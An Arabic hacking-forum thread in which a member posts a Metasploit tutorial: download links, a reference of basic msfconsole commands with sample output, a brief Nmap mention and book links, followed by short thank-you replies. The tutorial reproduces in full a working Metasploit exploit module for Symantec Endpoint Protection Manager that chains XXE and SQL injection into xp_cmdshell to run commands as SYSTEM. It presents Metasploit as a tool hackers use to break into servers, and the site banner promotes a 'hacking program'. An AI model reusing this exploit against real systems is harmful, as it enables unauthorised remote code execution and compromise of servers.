1. أهلا وسهلاً بكم في :: IQ-TeaM FORUM :: .
    إذا كانت هذه الزيارة الأولى أو لديك الرغبة بالانضمام لأعضاء شبكة عراق تيم فيجب الاطلاع على خصوصية الشبكه فربما بقائك زائر افضل لك من الانضمام بحيث أن قوانين شبكة عراق تيم لا تتناسب مع اهتماماتك .
    • للأطلاع على الخصوصية وسياسة الاستخدام - التفاصيل
    • بعد الاطلاع على سياسة الموقع وقوانين شبكة عراق تيم يمكنك التسجيل معنا - تسجيل عضو جديد
    إستبعاد الملاحظة
  2. الملاحظات
    عزيزي زائر تم اطلاق الموقع الرسمي لبرنامج الاختراق Spy-Note
    إستبعاد الملاحظة
حالة الموضوع:
مغلق
  1. or0
    V • I • P

    عضو منذ:
    ‏22 فبراير 2014
    عدد المشاركات:
    348
    الإعجابات المتلقاة:
    14
    نقاط الجائزة:
    50
    نظام التشغيل:
    Linux
    اللغة البرمجية:
    Perl
    Facebook:
    IQ_tema











    السلام عليكم ورحمه الله وبركاته ...​


    1- تحميل الميتا سبوليت للويندوز واللينكس .
    2- دروس في الميتا سبلويت .
    3- كتابين لـ تعليم Metasploit .


    اولا : تحميل الميتا سبلويت للويندوز واللينكس :

    قبل ان نبدأ الدروس , عليك ان تمتلك الميتا سبلويت للتعويد على كتابة الاوامر والادوات داخل الميتا سبلويت , فقبل كل شيء قم بتحميل اخر اصدار للميتا سبلويت 4.8.2 :

    1- لنظام الويندوز :
    من الرابط :
    عزيزي الزائر يتوجب عليك التسجيل لمشاهدة الروابط [ تسجيل الدخول ]


    2-لنظام اللينكس :
    عزيزي الزائر يتوجب عليك التسجيل لمشاهدة الروابط [ تسجيل الدخول ]


    3- لنظام اللينكس 64 بت :
    عزيزي الزائر يتوجب عليك التسجيل لمشاهدة الروابط [ تسجيل الدخول ]


    ويمكنك الدخول على الرابط التالي للتأكد من وجود اصدار جديد , علما ان هذا الاصدار اخر مرة تحقق منه في تاريخ 2014-2-20 :
    رابط :
    عزيزي الزائر يتوجب عليك التسجيل لمشاهدة الروابط [ تسجيل الدخول ]




    ثانيا : دروس تعليمية للميتا سبلويت :

    مقدمة ومفاهيم عن الميتا سبلويت :

    الـ ميتا سبوليت Metasploit Framework :

    الميتا سبلويت هي Framework مشروع بدأ في سنة 2003 , وقد شهد تطورات تدريجية من ذلك الوقت لحد الان , وتحتوي الميتا سبلويت على العديد من ثغرات لفحص الانظمة والشبكات العديدة والانواع الاخرى من الثغرات .
    والميتا سبلويت هو مشروع قوي جدا , ومساعد القراصنة على فحص الانظمة والشبكات واكتشاف الثغرات .
    وقد جعل الكثير من القراصنة استغلاله في اختراق الاجهزة والسيرفرات من خلال استغلال ثغرات الانظمة والثغرات الاخرى المكتشفة في الميتا سبوليت .
    وايضا الميتا سبلوت تمكن المستخدمين من اضافة ثغرات جديدة للمشروع لأطلاقها في اصدارات جديدة للمشروع .
    والميتا سبلويت بأختصار " اختبار الاختراق للاجهزة والشبكات والانظمة والخوادم و الفحوصات العامة في الويب وعالم الثغرات والاختراق ..."

    وتستخدم الميتا سبلويت لغة البيرل والبايثون وغيرها من اللغات لصنع الثغرات واستغلالها , ويوجد الكثير من ثغرات الميتا سبلويت الموجودة في موقع exploit-db , مثال لثغرة موجودة في الميتا سبلويت :
    اسم الثغرة : Symantec Endpoint Protection Manager - Remote Command Execution

    كود الثغرة :
    كود:
    require 'msf/core'
    require 'msf/core/exploit/powershell'
     
    class Metasploit3 < Msf::Exploit::Remote
      Rank = ExcellentRanking
     
      include REXML
      include Msf::Exploit::CmdStagerVBS
      include Msf::Exploit::Remote::HttpClient
     
      def initialize(info = {})
        super(update_info(info,
          'Name'           => 'Symantec Endpoint Protection Manager Remote Command Execution',
          'Description'    => %q{
            This module exploits XXE and SQL injection flaws in Symantec Endpoint Protection Manager
            versions 11.0, 12.0 and 12.1. When supplying a specially crafted XXE request an attacker
            can reach SQL injection affected components. As xp_cmdshell is enabled in the included
            database instance, it's possible to execute arbitrary system commands on the remote system
            with SYSTEM privileges.
          },
          'Author'         =>
            [
              'Stefan Viehbock', # Discovery
              'Chris Graham', # PoC exploit
              'xistence <xistence[at]0x90.nl>' # Metasploit module
            ],
          'License'        => MSF_LICENSE,
          'References'     =>
            [
              [ 'CVE', '2013-5014' ],
              [ 'CVE', '2013-5015' ],
              [ 'EDB', '31853'],
              [ 'URL', 'https://www.sec-consult.com/fxdata/seccons/prod/temedia/advisories_txt/20140218-0_Symantec_Endpoint_Protection_Multiple_critical_vulnerabilities_wo_poc_v10.txt' ]
            ],
          'Arch'           => ARCH_X86,
          'Platform'       => 'win',
          'Targets'        =>
            [
              ['Windows VBS Stager', {}]
            ],
          'Privileged'     => true,
          'DisclosureDate' => 'Feb 24 2014',
          'DefaultTarget'  => 0))
     
        register_options(
          [
            Opt::RPORT(9090),
            OptString.new('TARGETURI', [true, 'The base path', '/'])
          ], self.class)
      end
     
      def check
        res = send_request_cgi(
          {
            'uri'   =>  normalize_uri(target_uri.path),
            'method' => 'GET',
          })
     
        if res && res.code == 200 && res.body =~ /Symantec Endpoint Protection Manager/ && res.body =~ /1995 - 2013 Symantec Corporation/
          return Exploit::CheckCode::Appears
        end
     
        Exploit::CheckCode::Safe
      end
     
      def exploit
        print_status("#{peer} - Sending payload")
        # Execute the cmdstager, max length of the commands is ~3950
        execute_cmdstager({:linemax => 3950})
      end
     
      def execute_command(cmd, opts = {})
        # Convert the command data to hex, so we can use that in the xp_cmdshell. Else characters like '>' will be harder to bypass in the XML.
        command = "0x#{Rex::Text.to_hex("cmd /c #{cmd}", '')}"
     
        # Generate random 'xx032xxxx' sequence number.
        seqnum = "#{rand_text_numeric(2)}032#{rand_text_numeric(4)}"
     
        soap = soap_request(seqnum, command)
     
        post_data = Rex::MIME::Message.new
        post_data.add_part(soap, "text/xml", nil, "form-data; name=\"Content\"")
        xxe = post_data.to_s
     
        res = send_request_cgi(
          {
            'uri' => normalize_uri(target_uri.path, 'servlet', 'ConsoleServlet'),
            'method' => 'POST',
            'vars_get' => { 'ActionType' => 'ConsoleLog' },
            'ctype'  => "multipart/form-data; boundary=#{post_data.bound}",
            'data' => xxe,
          })
     
        if res and res.body !~ /ResponseCode/
          fail_with(Failure::Unknown, "#{peer} - Something went wrong.")
        end
      end
     
      def soap_request(seqnum, command)
        randpayload = rand_text_alpha(8+rand(8))
        randxxe = rand_text_alpha(8+rand(8))
        entity = "<!ENTITY #{randpayload} SYSTEM \"http://127.0.0.1:9090/servlet/ConsoleServlet?"
        entity << "ActionType=ConfigServer&action=test_av&SequenceNum=#{seqnum}&Parameter=';call xp_cmdshell(#{command});--\" >"
     
        xml = Document.new
        xml.add(DocType.new('sepm', "[ METASPLOIT ]"))
        xml.add_element("Request")
        xxe = xml.root.add_element(randxxe)
        xxe.text = "PAYLOAD"
     
        xml_s = xml.to_s
        xml_s.gsub!(/METASPLOIT/, entity) # To avoid html encoding
        xml_s.gsub!(/PAYLOAD/, "&#{randpayload};") # To avoid html encoding
     
        xml_s
      end
     
    end
    هذا الكود عبارة عن تعليمات برمجية مكتوبة بأحد لغات البرمجة , وتستخدم في الميتا سبلويت لآستغلال السيرفرات المصابة بهذه الثغرة .

    ويمكنك انت بنفسك صنع وكتابة ثغرات ونشرها في مشروع الميتا سبلوت .



    الاكواد والاوامر الاساسية في الميتا سبلوت :

    0- كود اظهار التفاصيل في الميتا سبلويت :
    كود:
    Msfconsole
    1- كود اظهار جميع الثغرات الموجودة في الميتا سبلويت :
    كود:
    show exploits
    2- كود اظهار البايلود في الميتا سبلويت :
    كود:
    show payloads
    * البايلود هو اظهار صلاحيات الثغرة .

    3- كود اظهار ثغرات الفحص :
    كود:
    show auxiliary 
    *ثغرات الفحص المقصود بها هي اظهار ثغرات الي تفحص البورتات والمنافذ للاجهزة والسيرفرات وثغرات الفحص الاخرى .

    4- كود استخدام ثغرة او بايلود :
    كود:
    use
    *يستخدم هذا الكود لأستخدام ثغرة مثلا :
    كود:
    use aplof\temp\exploit\tag
    ومعناها استخدم هذه الثغرة : aplof\temp\exploit\tag

    5- كود ضبط الاوامر والتعديل على خيارات الثغرة :
    كود:
    set
    مثال :
    كود:
    set LHOST 129.168.1.100
    ومعناه ضبط الـ Local Host الخاص بالـ يبي الجهاز , وممكن ضبط البورت ايضا وهناك اعدادات للضبط , وجميع الاعدادات بسيطة .
    6- كود اظهار الخيارات :
    كود:
    show options 
    * اظهار خيارات الثغرة , او خيارات الاعدادات او ... .

    7- كود اظهار ثغرات التشفير :
    كود:
    show encoders
    8- كود اظهار ألـنوبس :
    كود:
    show nops 
    * يستخدم لغرض عرض مكونات او مولدات الـnops .

    9- اكواد اخرى سريعة لا داعي لشرحها فقط معرفة بالانجليزية للكلمات , ومنقولة من كتاب صانعي مشروع الميتا سبلويت :
    كود:
       Command               Description                                         
       -------               -----------                                         
       db_add_host           Add one or more hosts to the database               
       db_add_note           Add a note to host                                  
       db_add_port           Add a port to host                                  
       db_autopwn            Automatically exploit everything                    
       db_hosts              List all hosts in the database                      
       db_import_nessus_nbe  Import a Nessus scan result file (NBE)              
       db_import_nmap_xml    Import a Nmap scan results file (-oX)               
       db_nmap               Executes nmap and records the output automatically  
       db_notes              List all notes in the database                      
       db_services           List all services in the database                   
       db_vulns              List all vulnerabilities in the database
    10- كود الرجوع :
    كود:
    back
    11- كود العرض والمشاهدة في الرئيسية :
    كود:
    banner
    مثال :
    كود:
    msf > banner
    
    Frustrated with proxy pivoting? Upgrade to layer-2 VPN pivoting with
    Metasploit Pro -- type 'go_pro' to launch it now.
    
           =[ metasploit v4.8.2-2014021901 [core:4.8 api:1.0] ]
    + -- --=[ 1265 exploits - 695 auxiliary - 202 post ]
    + -- --=[ 330 payloads - 32 encoders - 8 nops      ]
    12- كود التحقق :
    كود:
    check
    مثأل :
    كود:
    msf exploit(ms08_067_netapi) > show options
    
    Module options (exploit/windows/smb/ms08_067_netapi):
    
       Name     Current Setting  Required  Description
       ----     ---------------  --------  -----------
       RHOST    172.16.194.134   yes       The target address
       RPORT    445              yes       Set the SMB service port
       SMBPIPE  BROWSER          yes       The pipe name to use (BROWSER, SRVSVC)
    
    
    Exploit target:
    
       Id  Name
       --  ----
       0   Automatic Targeting
    
    
    msf exploit(ms08_067_netapi) > check
    
    [*] Verifying vulnerable status... (path: 0x0000005a)
    [*] System is not vulnerable (status: 0x00000000)
    [*] The target is not exploitable.
    msf  exploit(ms08_067_netapi) >
    
    13- كود ضبط اللون :
    كود:
    color
    مثال :
    كود:
    msf > banner
    Usage: color <'true'|'false'|'auto'>
    
    Enable or disable color output.
    14- كود الاتصال :
    كود:
    connect
    * يتم عبر الايبي والبورت , مثال :
    كود:
    msf > connect 192.168.1.1 23
    [*] Connected to 192.168.1.1:23
    DD-WRT v24 std (c) 2008 NewMedia-NET GmbH
    Release: 07/27/08 (SVN revision: 10011)
    DD-WRT login:
    15- كود اظهار المعلومات :
    كود:
    info
    * يستخدم لآظهار المعلومات او معلومات الثغرة , مثال :
    كود:
    msf  exploit(ms09_050_smb2_negotiate_func_index) > info exploit/windows/smb/ms09_050_smb2_negotiate_func_index 
    
           Name: Microsoft SRV2.SYS SMB Negotiate ProcessID Function Table Dereference
         Module: exploit/windows/smb/ms09_050_smb2_negotiate_func_index
        Version: 14774
       Platform: Windows
     Privileged: Yes
        License: Metasploit Framework License (BSD)
           Rank: Good
    
    Provided by:
      Laurent Gaffie 
      hdm 
      sf 
    
    Available targets:
      Id  Name
      --  ----
      0   Windows Vista SP1/SP2 and Server 2008 (x86)
    
    Basic options:
      Name   Current Setting  Required  Description
      ----   ---------------  --------  -----------
      RHOST                   yes       The target address
      RPORT  445              yes       The target port
      WAIT   180              yes       The number of seconds to wait for the attack to complete.
    
    Payload information:
      Space: 1024
    
    Description:
      This module exploits an out of bounds function table dereference in 
      the SMB request validation code of the SRV2.SYS driver included with 
      Windows Vista, Windows 7 release candidates (not RTM), and Windows 
      2008 Server prior to R2. Windows Vista without SP1 does not seem 
      affected by this flaw.
    
    References:
      http://www.microsoft.com/technet/security/bulletin/MS09-050.mspx
      http://cve.mitre.org/cgi-bin/cvename.cgi?name=2009-3103
      http://www.securityfocus.com/bid/36299
      http://www.osvdb.org/57799
      http://seclists.org/fulldisclosure/2009/Sep/0039.html
      http://www.microsoft.com/technet/security/Bulletin/MS09-050.mspx
    
    msf  exploit(ms09_050_smb2_negotiate_func_index) >
    16 - كود استيراد الاضافات :
    كود:
    load
    مثال :
    كود:
    msf > load
    Usage: load <path> [var=val var=val ...]
    
    Loads a plugin from the supplied path.  If path is not absolute, first looks
    in the user's plugin directory (/root/.msf4/plugins) then
    in the framework root plugin directory (/usr/share/metasploit-framework/plugins).
    The optional var=val options are custom parameters that can be passed to plugins.
    
    msf > load pcap_log
    [*] PcapLog plugin loaded.
    [*] Successfully loaded plugin: pcap_log
    
    17- كود استيراد اضافات في المسارات :
    كود:
    loadpath
    مثال :
    كود:
    msf > loadpath /home/secret/modules
    
    Loaded 0 modules.
    18- كود عدم الاستيراد :
    كود:
    unload
    مثال :
    كود:
    msf > unload pcap_log
    Unloading plugin pcap_log...unloaded.
    19- كود التعديل والسماح والضبط في الـ Socks والـ Session :
    كود:
    route
    مثال :
    كود:
    meterpreter > route -h
    Usage: route [-h] command [args]
    
    Display or modify the routing table on the remote machine.
    
    Supported commands:
    
       add    [subnet] [netmask] [gateway]
       delete [subnet] [netmask] [gateway]
       list
    
    meterpreter >
    meterpreter > route
    
    Network routes
    ==============
    
        Subnet           Netmask          Gateway
        ------           -------          -------
        0.0.0.0          0.0.0.0          172.16.1.254
        127.0.0.0        255.0.0.0        127.0.0.1
        172.16.1.0       255.255.255.0    172.16.1.100
        172.16.1.100     255.255.255.255  127.0.0.1
        172.16.255.255   255.255.255.255  172.16.1.100
        224.0.0.0        240.0.0.0        172.16.1.100
        255.255.255.255  255.255.255.255  172.16.1.100
    
    20- كود البحث :
    كود:
    Search
    مثال :
    كود:
    msf > search usermap_script
    
    Matching Modules
    ================
    
       Name                                Disclosure Date  Rank       Description
       ----                                ---------------  ----       -----------
       exploit/multi/samba/usermap_script  2007-05-14       excellent  Samba "username map script" Command Execution
    
    
    msf >
    21- كود المساعدة :
    كود:
    Help
    مثال :
    كود:
    msf > help search
    Usage: search [keywords]
    
    Keywords:
      name      :  Modules with a matching descriptive name
      path      :  Modules with a matching path or reference name
      platform  :  Modules affecting this platform
      type      :  Modules of a specific type (exploit, auxiliary, or post)
      app       :  Modules that are client or server attacks
      author    :  Modules written by this author
      cve       :  Modules with a matching CVE ID
      bid       :  Modules with a matching Bugtraq ID
      osvdb     :  Modules with a matching OSVDB ID
    
    Examples:
      search cve:2009 type:exploit app:client
    
    msf >
    22- كود البحث بواسطة الاسم :
    كود:
    Name
    مثال :
    كود:
    msf > search name:mysql
    
    Matching Modules
    ================
    
       Name                                               Disclosure Date  Rank       Description
       ----                                               ---------------  ----       -----------
       auxiliary/admin/mysql/mysql_enum                                    normal     MySQL Enumeration Module
       auxiliary/admin/mysql/mysql_sql                                     normal     MySQL SQL Generic Query
       auxiliary/analyze/jtr_mysql_fast                                    normal     John the Ripper MySQL Password Cracker (Fast Mode)
       auxiliary/scanner/mysql/mysql_authbypass_hashdump  2012-06-09       normal     MySQL Authentication Bypass Password Dump
       auxiliary/scanner/mysql/mysql_hashdump                              normal     MYSQL Password Hashdump
       auxiliary/scanner/mysql/mysql_login                                 normal     MySQL Login Utility
       auxiliary/scanner/mysql/mysql_schemadump                            normal     MYSQL Schema Dump
       auxiliary/scanner/mysql/mysql_version                               normal     MySQL Server Version Enumeration
       exploit/linux/mysql/mysql_yassl_getname            2010-01-25       good       MySQL yaSSL CertDecoder::GetName Buffer Overflow
       exploit/linux/mysql/mysql_yassl_hello              2008-01-04       good       MySQL yaSSL SSL Hello Message Buffer Overflow
       exploit/windows/mysql/mysql_payload                2009-01-16       excellent  Oracle MySQL for Microsoft Windows Payload Execution
       exploit/windows/mysql/mysql_yassl_hello            2008-01-04       average    MySQL yaSSL SSL Hello Message Buffer Overflow
    msf > 
    23- كود البحث بواسطة المسار :
    كود:
    Path
    مثال :
    كود:
    msf > search path:scada
    
    Matching Modules
    ================
    
       Name                                                 Disclosure Date  Rank     Description
       ----                                                 ---------------  ----     -----------
       auxiliary/admin/scada/igss_exec_17                   2011-03-21       normal   Interactive Graphical SCADA System Remote Command Injection
       exploit/windows/scada/citect_scada_odbc              2008-06-11       normal   CitectSCADA/CitectFacilities ODBC Buffer Overflow
    ...snip...
    24- كود فلترة نوع البحث حسب النوع :
    كود:
    type
    مثال :
    كود:
    msf > search type:post
    
    Matching Modules
    ================
    
       Name                                                Disclosure Date  Rank    Description
       ----                                                ---------------  ----    -----------
       post/linux/gather/checkvm                                            normal  Linux Gather Virtual Environment Detection
       post/linux/gather/enum_cron                                          normal  Linux Cron Job Enumeration
       post/linux/gather/enum_linux                                         normal  Linux Gather System Information
    ...snip...
    25- كود البحث بواسطة الصانع للثغرة :
    كود:
    author
    مثال :
    كود:
    msf > search author:dookie
    
    Matching Modules
    ================
    
       Name                                                       Disclosure Date  Rank     Description
       ----                                                       ---------------  ----     -----------
       exploit/osx/http/evocam_webserver                          2010-06-01       average  MacOS X EvoCam HTTP GET Buffer Overflow
       exploit/osx/misc/ufo_ai                                    2009-10-28       average  UFO: Alien Invasion IRC Client Buffer Overflow Exploit
       exploit/windows/browser/amaya_bdo                          2009-01-28       normal   Amaya Browser v11.0 bdo tag overflow
    ...snip...

    شرح اداة Nmap :
    اداة Nmap هي اداة لعمل فحص كامل للموقع المستهدف او السيرفر او الجهاز .

    وأهم المهمات التي تستعمل في هذه الاداة هي :
    1- معرفة البورتات المفتوحة .
    2- معرفة معلومات النظام .
    3- معرفة البرامج الموجودة على السيرفر والبورت الذي يعمل عليه .
    4- وعمل فحص كامل لباقي المعلومات .

    ولمعرفة طريقة استعمال هذه الاداة اكتب في موجه الاوامر للميتا سبلويت الأمر التالي :
    كود:
    Info nmap

    كتابين pdf لـ Metasploit :



    1- كتاب Metasploit User Guide 3.2 :
    الاصدار : 3.2
    الصيغة :pdf
    الكتاب مهم ومفيد وهو الكتاب الرسمي من صانعي الميتا سبلويت .
    التحميل :
    عزيزي الزائر يتوجب عليك التسجيل لمشاهدة الروابط [ تسجيل الدخول ]





    2- كتاب Metasploit Guide :
    هو كتاب يشرح استخدام الاوامر والثغرات مع تطبيقات على ثغرات في الميتا سبلويت , هو كتاب مفيد لزيادة التعليم في الميتا سبلويت :
    الكتاب بصيغة pdf
    تحميله من الرابط التالي :
    عزيزي الزائر يتوجب عليك التسجيل لمشاهدة الروابط [ تسجيل الدخول ]




    كنت ارغب في زيادة الدروس , واعتذر لقلتها , وشكرا للمتابعة وحظ موفق في تعليم الميتا سبلويت .

    سلام .​
     
    1 person likes this.
    جاري تحميل الصفحة...
  2. NETJOURNAL
    مشرف

    عضو منذ:
    ‏18 مايو 2006
    عدد المشاركات:
    647
    الإعجابات المتلقاة:
    1,544
    نقاط الجائزة:
    215
    الجنس:
    ذكر
    الوظيفة:
    ExploitCoding - ShellCoding - Defacer
    الإقامة:
    etc/shadow/~root
    نظام التشغيل:
    windows 7
    اللغة البرمجية:
    PHP
    رد: دروس تعليم الميتا سبلويت و تحميل Metasploit Framework للويندوز واللينكس و كتابين لـتعليم Meatsploit

    وعليكم ألسلام و رحمة الله و بركلتة .
    شرح ممتاز. عزيزي . بارك الله فيك .
    بس ينقل الى القسم الصحيح . ( اختبار الاختراق ).
     
  3. or0
    V • I • P

    عضو منذ:
    ‏22 فبراير 2014
    عدد المشاركات:
    348
    الإعجابات المتلقاة:
    14
    نقاط الجائزة:
    50
    نظام التشغيل:
    Linux
    اللغة البرمجية:
    Perl
    Facebook:
    رد: دروس تعليم الميتا سبلويت و تحميل Metasploit Framework للويندوز واللينكس و كتابين لـتعليم Meatsploit


    شكرا للنقل .. كنت ابحث عن قسم اختبار الاختراق لكن لا اعرف لم الاحظه .

    على اي حال شكرا وبارك الله فيك ...
     
  4. CoMmAnDo AlMaSaBi
    DeveloPer Plus

    عضو منذ:
    ‏13 مايو 2013
    عدد المشاركات:
    122
    الإعجابات المتلقاة:
    1
    نقاط الجائزة:
    50
    رد: دروس تعليم الميتا سبلويت و تحميل Metasploit Framework للويندوز واللينكس و كتابين لـتعليم Meatsploit

    وعليكم السلام
    بارك الله فيك اخي
    )5:")5:"
     
  5. خأإآلد
    DeveloPer Plus

    عضو منذ:
    ‏18 ديسمبر 2011
    عدد المشاركات:
    100
    الإعجابات المتلقاة:
    2
    نقاط الجائزة:
    50
    الإقامة:
    K.s.A
    نظام التشغيل:
    Linux
    رد: دروس تعليم الميتا سبلويت و تحميل Metasploit Framework للويندوز واللينكس و كتابين لـتعليم Meatsploit

    تِسلَـمْ أخِي
    بَاركـَ الله فِيكَ
     
  6. ρяoғеѕoя
    rankrank
    Developer

    عضو منذ:
    ‏2 ابريل 2012
    عدد المشاركات:
    61
    الإعجابات المتلقاة:
    1
    نقاط الجائزة:
    30
    الإقامة:
    IQ-TEAM
    نظام التشغيل:
    Linux
    رد: دروس تعليم الميتا سبلويت و تحميل Metasploit Framework للويندوز واللينكس و كتابين لـتعليم Meatsploit

    موضوع في قمة الخيااال
    طرحت فابدعت
    دمت ودام عطائك
    ودائما بأنتظار جديدك الشيق :{1}:
     
  7. or0
    V • I • P

    عضو منذ:
    ‏22 فبراير 2014
    عدد المشاركات:
    348
    الإعجابات المتلقاة:
    14
    نقاط الجائزة:
    50
    نظام التشغيل:
    Linux
    اللغة البرمجية:
    Perl
    Facebook:
    رد: دروس تعليم الميتا سبلويت و تحميل Metasploit Framework للويندوز واللينكس و كتابين لـتعليم Meatsploit



    شكرا ليكم ع المرور ....
    تحياتي .. !
     
  8. Murtadha Albejawe
    rankrank
    Developer

    عضو منذ:
    ‏28 يوليو 2012
    عدد المشاركات:
    76
    الإعجابات المتلقاة:
    4
    نقاط الجائزة:
    30
    الإقامة:
    $$$
    رد: دروس تعليم الميتا سبلويت و تحميل Metasploit Framework للويندوز واللينكس و كتابين لـتعليم Meatsploit

    تسلم على الشرح الرائع
    بارك الله فيك اخي !:"​
     
حالة الموضوع:
مغلق

مشاركة هذه الصفحة

جاري تحميل الصفحة...